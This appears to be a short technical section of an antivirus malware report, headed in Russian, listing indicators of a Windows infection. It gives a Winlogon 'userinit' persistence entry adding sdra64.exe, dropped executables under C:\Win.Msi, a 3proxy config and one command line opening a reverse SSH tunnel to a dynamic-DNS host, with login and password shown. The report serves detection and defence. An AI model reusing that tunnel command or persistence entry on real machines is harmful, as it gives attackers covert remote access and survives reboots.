Техническая информация
- [<HKLM>\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon] 'userinit' = '<SYSTEM32>\userinit.exe,<SYSTEM32>\sdra64.exe,'
- %HOMEPATH%\Start Menu\Programs\Startup\DiskDoctor.lnk
- C:\Win.Msi\cssrs.exe
- C:\Win.Msi\System.exe -ssh -R 61942:127.0.0.1:2103 bmw530.zapto.org -l bmw -pw 906090lol
- C:\Win.Msi\alg.exe
- C:\Win.Msi\vbv.exe
- %WINDIR%\Microsoft.NET\Framework\v2.0.50727\AppLaunch.exe
- %WINDIR%\Microsoft.NET\Framework\v2.0.50727\AppLaunch.exe
- C:\Win.Msi\3proxy.cfg
- C:\Win.Msi\vbv.exe
- <SYSTEM32>\sdra64.exe
- <LS_APPDATA>\PUTTY.RND
- C:\Win.Msi\DiskDoctor.lnk
- C:\Win.Msi\alg.exe
- C:\Win.Msi\cssrs.exe
- C:\Win.Msi\System.exe
- <SYSTEM32>\sdra64.exe
- 'bm####.zapto.org':22
- DNS ASK bm####.zapto.org
- ClassName: 'Shell_TrayWnd' WindowName: ''
- ClassName: 'EDIT' WindowName: ''